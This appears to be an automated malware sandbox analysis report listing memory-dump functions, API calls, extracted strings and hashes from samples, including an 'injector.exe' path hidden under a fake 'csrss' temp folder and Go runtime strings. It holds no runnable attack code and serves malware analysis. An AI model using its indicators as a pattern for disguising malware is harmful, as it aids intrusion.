                                                              • Instruction Fuzzy Hash: D9511862F1A7C356E7248F7598403796B91E790B90F589231D79CC7BDACE2CD464C700
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                              • String ID: ios_base::failbit set
                                                              • API String ID: 73155330-3924258884
                                                              • Opcode ID: b173cbb97e25df18fb4874a723ea1798176f7d9395f438a44dd196d1cacc4d3b
                                                              • Instruction ID: a1b12134eceb575ffc9058fc6be2e9fae3480e2052f4e93761a970c3292bc3c7
                                                              • Opcode Fuzzy Hash: b173cbb97e25df18fb4874a723ea1798176f7d9395f438a44dd196d1cacc4d3b
                                                              • Instruction Fuzzy Hash: F741B86270AB8365EE14AF25A4442BEA351FB44BD4F544631DFAD8BBC9DE3CD161C300
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: CreateFrameInfo__except_validate_context_record
                                                              • String ID: csm
                                                              • API String ID: 2558813199-1018135373
                                                              • Opcode ID: 1e8bdd6c694ec2b645be78f9d24aec0e2489a08d3f49d285c7cb06928bb6b1a7
                                                              • Instruction ID: f0d78ec419f668c0a90987bb2f63ee2318b73e2b7d6be3b27e1cb9a088a45cb2
                                                              • Opcode Fuzzy Hash: 1e8bdd6c694ec2b645be78f9d24aec0e2489a08d3f49d285c7cb06928bb6b1a7
                                                              • Instruction Fuzzy Hash: C851667261A7479AE760DB15E44436E77A0F789BA5F140234EB8D87B9ACF3CE065CB00
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A00AB2B6
                                                                • Part of subcall function 00007FF6A00AE5E4: HeapFree.KERNEL32(?,?,00007FF6A00AD60F,00007FF6A00B7DC0,?,?,?,00007FF6A00B8143,?,?,0000E94925CDEBB0,00007FF6A00B8688,?,?,?,00007FF6A00B85BB), ref: 00007FF6A00AE5FA
                                                                • Part of subcall function 00007FF6A00AE5E4: GetLastError.KERNEL32(?,?,00007FF6A00AD60F,00007FF6A00B7DC0,?,?,?,00007FF6A00B8143,?,?,0000E94925CDEBB0,00007FF6A00B8688,?,?,?,00007FF6A00B85BB), ref: 00007FF6A00AE60C
                                                              • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6A009D849), ref: 00007FF6A00AB2D4
                                                              Strings
                                                              • C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe, xrefs: 00007FF6A00AB2C2
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                              • String ID: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe
                                                              • API String ID: 3580290477-1497792312
                                                              • Opcode ID: d07806923a240e9b42c0af4a433109874be1beebc6025e65424fba5256e757d0
                                                              • Instruction ID: 012aa351e6f2f082e69abd53bcadd76f813e6f93f2ab784757ad640bdda716f1
                                                              • Opcode Fuzzy Hash: d07806923a240e9b42c0af4a433109874be1beebc6025e65424fba5256e757d0
                                                              • Instruction Fuzzy Hash: 80416F32E0AB53A6EB14DF25A4501BD27A4FF45794BA44036EA8DC7B8ADE3CE5618300
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: ErrorFileLastWrite
                                                              • String ID: U
                                                              • API String ID: 442123175-4171548499
                                                              • Opcode ID: ef580d635dde8ef3720f0bf036fcd3533ab23aa0b8df9f85e9dd75b1584e7d17
                                                              • Instruction ID: 48d2b811a9646251f3091bdaa34e5e53f943cb567bdb882d4509d07f985b1bb5
                                                              • Opcode Fuzzy Hash: ef580d635dde8ef3720f0bf036fcd3533ab23aa0b8df9f85e9dd75b1584e7d17
                                                              • Instruction Fuzzy Hash: B041E222B2AA82A6DB209F25E4543BA67A1FB88B84F904131EE4DC7799DF3CD411C750
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: ios_base::failbit set
                                                              • API String ID: 3215553584-3924258884
                                                              • Opcode ID: 918c2305aea0f570d03a744ed01c0d7ddd8fad88daa9e012b788a703a79d1063
                                                              • Instruction ID: 2236b878b6f6ee509811343c3549ea4b7b6657a3e3e674c7b2bc913b957d167b
                                                              • Opcode Fuzzy Hash: 918c2305aea0f570d03a744ed01c0d7ddd8fad88daa9e012b788a703a79d1063
                                                              • Instruction Fuzzy Hash: DC31C661E0E743A2E6615A11A5402BD6260FFA67E0FD04631DAAC97BDFDF3CE4728700
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: _handle_errorf
                                                              • String ID: "$powf
                                                              • API String ID: 2315412904-603753351
                                                              • Opcode ID: d592a859933890cdd57d7dbf68ff2918b61bba60df7e98e1b2b9030277a19e82
                                                              • Instruction ID: 0c5b2584e3641d84c957e055d6064082467c95e848f6bc3d88bb89925cd6e3a6
                                                              • Opcode Fuzzy Hash: d592a859933890cdd57d7dbf68ff2918b61bba60df7e98e1b2b9030277a19e82
                                                              • Instruction Fuzzy Hash: 74414273D29681DAD370CF22E0847A9B7A0F79A34DF101325F74942AA9CF7DD5A49B04
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: _handle_error
                                                              • String ID: "$pow
                                                              • API String ID: 1757819995-713443511
                                                              • Opcode ID: 6600cf8cc386849cdc45c6f3dac13c67aaf6601de347aff380f29c236909c0c2
                                                              • Instruction ID: 1e9f61552fc206a44952c84fd80bab15d8f44dd0df9615e23175876e9272b89b
                                                              • Opcode Fuzzy Hash: 6600cf8cc386849cdc45c6f3dac13c67aaf6601de347aff380f29c236909c0c2
                                                              • Instruction Fuzzy Hash: 55315C72D1DA8697D760CF10E44076ABAA0FBDB345F201325F78986A59CFBDD0959F00
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: _set_errno_from_matherr
                                                              • String ID: exp
                                                              • API String ID: 1187470696-113136155
                                                              • Opcode ID: b94ccfe877b480f055c56df4a789eadf792ebadbb8a7197ff8c307239036b53c
                                                              • Instruction ID: 6bb44df71391e648fc4e4194cdc69cf61a7c807f74e00d67973dfbf7b4a76e3a
                                                              • Opcode Fuzzy Hash: b94ccfe877b480f055c56df4a789eadf792ebadbb8a7197ff8c307239036b53c
                                                              • Instruction Fuzzy Hash: FD210C76A1E746DBE760DF28E44066AB3A0FB99740F508135E68DC2B5AEF3CE4518F00
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: CompareStringtry_get_function
                                                              • String ID: CompareStringEx
                                                              • API String ID: 3328479835-2590796910
                                                              • Opcode ID: d62702aeeb23d077d50cf64610e65f1c90e7cdd79556739b61dedc982c1fdc6d
                                                              • Instruction ID: 7d3800f0bff49edc8188d6d7a80d4d1b3d730e017752e8af2020083198d1a170
                                                              • Opcode Fuzzy Hash: d62702aeeb23d077d50cf64610e65f1c90e7cdd79556739b61dedc982c1fdc6d
                                                              • Instruction Fuzzy Hash: 76113B36A08B8296D764CB55F4402AAB7A0FB89B84F548136EE8D83B5DCF3CD5608B40
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_Yarn
                                                              • String ID: bad locale name
                                                              • API String ID: 1838369231-1405518554
                                                              • Opcode ID: 32b908108cd237eb5cba1e8f9bac981e284d381217bdac2534e43f5b9a6d914e
                                                              • Instruction ID: 934391a4e54b531ef397a7bb501ebf27ed58103d751c0469e5c9d532be37ff3a
                                                              • Opcode Fuzzy Hash: 32b908108cd237eb5cba1e8f9bac981e284d381217bdac2534e43f5b9a6d914e
                                                              • Instruction Fuzzy Hash: 2E01622350BB819AD744DF79A88015D77A5FB68B88B185139DA8CC371EEF38C5A0C340
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF6A0099B0E), ref: 00007FF6A009F530
                                                              • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF6A0099B0E), ref: 00007FF6A009F576
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: ExceptionFileHeaderRaise
                                                              • String ID: csm
                                                              • API String ID: 2573137834-1018135373
                                                              • Opcode ID: 1c1d4edfab81aec74bcfaf235aa39090f944405d8f8c0753ef25d74ea04d033e
                                                              • Instruction ID: f7a4e956ef504739ae72f6149675f9898f46201f6eca9835087c4a46cbc0bbb0
                                                              • Opcode Fuzzy Hash: 1c1d4edfab81aec74bcfaf235aa39090f944405d8f8c0753ef25d74ea04d033e
                                                              • Instruction Fuzzy Hash: 6B113A32619B4292EB208F25E840269B7A5FB88B94F194231DF8C87769DF3CD5718B00
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: DefaultUsertry_get_function
                                                              • String ID: GetUserDefaultLocaleName
                                                              • API String ID: 3217810228-151340334
                                                              • Opcode ID: 7e8f518c8604ffc61f28e03b5f03f992b79c04bb97c4ed7245e07b4e6ae7fe07
                                                              • Instruction ID: 1b171032edbf9a59c814f4a2a162d6913fde147324255c7813401db82d1a9b93
                                                              • Opcode Fuzzy Hash: 7e8f518c8604ffc61f28e03b5f03f992b79c04bb97c4ed7245e07b4e6ae7fe07
                                                              • Instruction Fuzzy Hash: F0F08214F2A583A1FB189B65B5405F96261AF4A7C1F944039D90DC7BAEDE2CE8A5C300
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                              • String ID: InitializeCriticalSectionEx
                                                              • API String ID: 539475747-3084827643
                                                              • Opcode ID: 3e5e89516c3b208d4de2910388d9803b3dbd8c46d2e262e577940497b006c2ed
                                                              • Instruction ID: a9501051e93265181c2e1d6d8bd9116db1745cd3841fb9a39a218ce3b73acffb
                                                              • Opcode Fuzzy Hash: 3e5e89516c3b208d4de2910388d9803b3dbd8c46d2e262e577940497b006c2ed
                                                              • Instruction Fuzzy Hash: 3BF0BE25E1A743A1E7048B55E4000B92220EF49B81F984435EA1D83B5ECF3CE9A6C700
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF6A00B0FA5
                                                              • TlsSetValue.KERNEL32(?,?,0000E94925CDEBB0,00007FF6A00AEF26,?,?,0000E94925CDEBB0,00007FF6A00A57A9,?,?,?,?,00007FF6A00B507E,?,?,00000000), ref: 00007FF6A00B0FBC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: Valuetry_get_function
                                                              • String ID: FlsSetValue
                                                              • API String ID: 738293619-3750699315
                                                              • Opcode ID: 0d8a84be871c5973d44aa728ee23869030e7b3f8ed9764413539ddc368b6f7a8
                                                              • Instruction ID: b1b54d6434e746d4eb209d6ff548d7f4248a6066c4d0757aa75a306779452760
                                                              • Opcode Fuzzy Hash: 0d8a84be871c5973d44aa728ee23869030e7b3f8ed9764413539ddc368b6f7a8
                                                              • Instruction Fuzzy Hash: 1AE0ED21B2A603B1FB188B20E8000B92222AF49781F988036C90DC639ECE3CE9B4C310
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Executed Functions

                                                              Non-executed Functions

                                                              Strings
                                                              • ", xrefs: 00428C69
                                                              • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:, xrefs: 00428C2C
                                                              • runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtoo many open filesunknown Go type: %vunknown certificateunknown cipher typeunknown status codeunknown wait , xrefs: 00428B96
                                                              • ,-./0456:;<=>?@BCLMNOPSZ["\, xrefs: 00428BC0
                                                              • bad g0 stackbad recoveryc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdumping heapend tracegcentersyscallexit status failed to %sfailed to %wgcpacertraceget UUID: %wgetaddrinfowhost is , xrefs: 00428C05
                                                              • VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing public modulusfailed to apply ACL to, xrefs: 00428C60
                                                              Memory Dump Source
                                                              • Source File: 00000025.00000002.430180091.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000025.00000002.430132002.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000025.00000002.433560714.00000000008C3000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000025.00000002.433572877.00000000008D1000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000025.00000002.433583818.00000000008D4000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000025.00000002.433592979.00000000008D7000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000025.00000002.433604561.00000000008D8000.00000080.00020000.sdmp Download File
                                                              • Associated: 00000025.00000002.433616399.00000000008D9000.00000004.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID: "$,-./0456:;<=>?@BCLMNOPSZ["\$VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing public modulusfailed to apply ACL to$bad g0 stackbad recoveryc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdumping heapend tracegcentersyscallexit status failed to %sfailed to %wgcpacertraceget UUID: %wgetaddrinfowhost is $runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:$runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtoo many open filesunknown Go type: %vunknown certificateunknown cipher typeunknown status codeunknown wait
                                                              • API String ID: 0-1070706453
                                                              • Opcode ID: 35bfc13783085809ff100db792aae9c6576bf432ec796ad2e4c0f2543c7307a5
                                                              • Instruction ID: d05530f15c22603299acca85900aed5cb2d67bbfa8ea3cc37d9bd2921fc2a2af
                                                              • Opcode Fuzzy Hash: 35bfc13783085809ff100db792aae9c6576bf432ec796ad2e4c0f2543c7307a5
                                                              • Instruction Fuzzy Hash: E95105B42097118FD340EF29D58575EBBE0FF48708F808A2EE88887352E7389944DF56
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              • m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=$WINDIR\rss%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat, xrefs: 004345D4
                                                              • m->p= next= p->m= prev= span=(...), not , val 390625<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCANCELCarianChakmaCommonCookieCopticDELETEExpectFormatFridayGOAWAYGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLockedLycianLydianMondayPADDEDPr, xrefs: 00434588
                                                              • releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestart copied file: %wstartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustrace/br, xrefs: 00434662
                                                              • releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileunexpected )unknown portwintrust.dllwirep: p->m=wtsapi32.dll != sweepgen MB released MB) workers= called from flushedWork gcscanvalid heap_marked= , xrefs: 00434566
                                                              Memory Dump Source
                                                              • Source File: 00000025.00000002.430180091.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000025.00000002.430132002.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000025.00000002.433560714.00000000008C3000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000025.00000002.433572877.00000000008D1000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000025.00000002.433583818.00000000008D4000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000025.00000002.433592979.00000000008D7000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000025.00000002.433604561.00000000008D8000.00000080.00020000.sdmp Download File
                                                              • Associated: 00000025.00000002.433616399.00000000008D9000.00000004.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID: m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=$WINDIR\rss%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat$ m->p= next= p->m= prev= span=(...), not , val 390625<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCANCELCarianChakmaCommonCookieCopticDELETEExpectFormatFridayGOAWAYGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLockedLycianLydianMondayPADDEDPr$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestart copied file: %wstartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustrace/br$releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileunexpected )unknown portwintrust.dllwirep: p->m=wtsapi32.dll != sweepgen MB released MB) workers= called from flushedWork gcscanvalid heap_marked=
                                                              • API String ID: 0-2527030486
                                                              • Opcode ID: 8b97a09f3ca774cfadb3114678e64e069106bda406771d947f6698ffa7ea8ee8
                                                              • Instruction ID: 7f80efca96c7c0026b2bbb8fce386263dcbd652a6508ac33117d8161810f2d9f
                                                              • Opcode Fuzzy Hash: 8b97a09f3ca774cfadb3114678e64e069106bda406771d947f6698ffa7ea8ee8
                                                              • Instruction Fuzzy Hash: CE51D4B46083158FD704EF25D185B6ABBE0BF88308F41996EE48987352D778D888DF96
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Executed Functions

                                                              Non-executed Functions

                                                              Strings
                                                              • runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtoo many open filesunknown Go type: %vunknown certificateunknown cipher typeunknown status codeunknown wait , xrefs: 00428B96
                                                              • VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing public modulusfailed to apply ACL to, xrefs: 00428C60
                                                              • bad g0 stackbad recoveryc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdumping heapend tracegcentersyscallexit status failed to %sfailed to %wgcpacertraceget UUID: %wgetaddrinfowhost is , xrefs: 00428C05
                                                              • ", xrefs: 00428C69
                                                              • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:, xrefs: 00428C2C
                                                              • ,-./0456:;<=>?@BCLMNOPSZ["\, xrefs: 00428BC0
                                                              Memory Dump Source
                                                              • Source File: 0000002A.00000002.621851748.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 0000002A.00000002.621834680.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 0000002A.00000002.625598433.00000000008C3000.00000040.00020000.sdmp Download File
                                                              • Associated: 0000002A.00000002.625616282.00000000008D1000.00000040.00020000.sdmp Download File
                                                              • Associated: 0000002A.00000002.625632697.00000000008D4000.00000040.00020000.sdmp Download File
                                                              • Associated: 0000002A.00000002.625643137.00000000008D7000.00000040.00020000.sdmp Download File
                                                              • Associated: 0000002A.00000002.625660103.00000000008D8000.00000080.00020000.sdmp Download File
                                                              • Associated: 0000002A.00000002.625676744.00000000008D9000.00000004.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID: "$,-./0456:;<=>?@BCLMNOPSZ["\$VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing public modulusfailed to apply ACL to$bad g0 stackbad recoveryc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdumping heapend tracegcentersyscallexit status failed to %sfailed to %wgcpacertraceget UUID: %wgetaddrinfowhost is $runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:$runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtoo many open filesunknown Go type: %vunknown certificateunknown cipher typeunknown status codeunknown wait
                                                              • API String ID: 0-1070706453
